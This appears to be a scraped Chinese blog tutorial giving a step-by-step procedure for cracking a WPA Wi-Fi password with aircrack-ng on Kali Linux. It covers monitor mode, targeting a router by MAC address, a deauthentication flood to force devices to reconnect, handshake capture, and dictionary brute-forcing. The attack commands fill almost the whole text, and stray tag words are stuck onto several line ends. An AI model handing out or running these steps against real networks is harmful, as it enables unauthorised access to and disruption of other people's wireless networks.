1.kali linux安全滲透linux
2.工具aircrack-ng安全
3.ifconfig查看你的網卡信息,wlan0即無線網卡,注意,若是沒有發現網卡多是芯片不能被識別,建議選擇網卡芯片爲3037或rtl8187l的。bash
4。看到這個界面後輸入airmon-ng start wlan0(啓動網卡監聽模式)工具
5.啓動後ifconfig查看一下,若是網卡名變成了wlan0mon了,則表示操做成功。3d
6.掃描附近wificode
airodump-ng wlan0monblog
參數詳解:路由
BSSID: MAC地址io
PWR:信號強度,越小信號越強。class
#Data:傳輸的數據, 數據越大對咱們越有利, 大的誇張的可能在看電影
CH:信號頻道
ESSID:wifi名稱
(好比我要抓的是這個)
7.而後輸入命令:
airodump-ng -c 11 --bssid 2E:E9:D3:28:59:EB -w
/home/chenglee/2018/
wlan0mon
解析:
-c表明頻道, 後面帶的是頻道
bssid: mac地址(物理地址)
-w表明目錄(抓到的握手包放在這個目錄下面)
wlan0mon: 網卡名稱
一直跑吖跑, 它的數據是不停刷新變化的...
這時候應該作點什麼了,利用deauth洪水攻擊,取消目標路由和全部設備的無線鏈接,這時候設備從新鏈接時,會抓取他的握手包,而後用字典進行爆破.
新開一個窗口觀察
ps:若是沒法獲取包,攻擊路由器進行斷網從新鏈接
輸入:aireplay-ng -0 0 -a 2E:E9:D3:28:59:EB wlan0mon
這時候目標路由已經斷網,若是抓到包記得ctrl+c關掉這裏,不然一直斷網就成惡做劇了。這時返回你抓包的那個窗口,若是右上角出現handshake這樣的信息(看下圖),這說明抓包已經成功。
能夠進去目錄看一下
8.破解
輸入:aircrack-ng -w
/home/chenglee/dictionary/wpa
.txt
/home/chenglee/2018/-01
.cap
解析:
-w後面接的是字典
-01.cap是握手包
也許過程會有點長, 這個得看密碼複雜的與字典的好壞。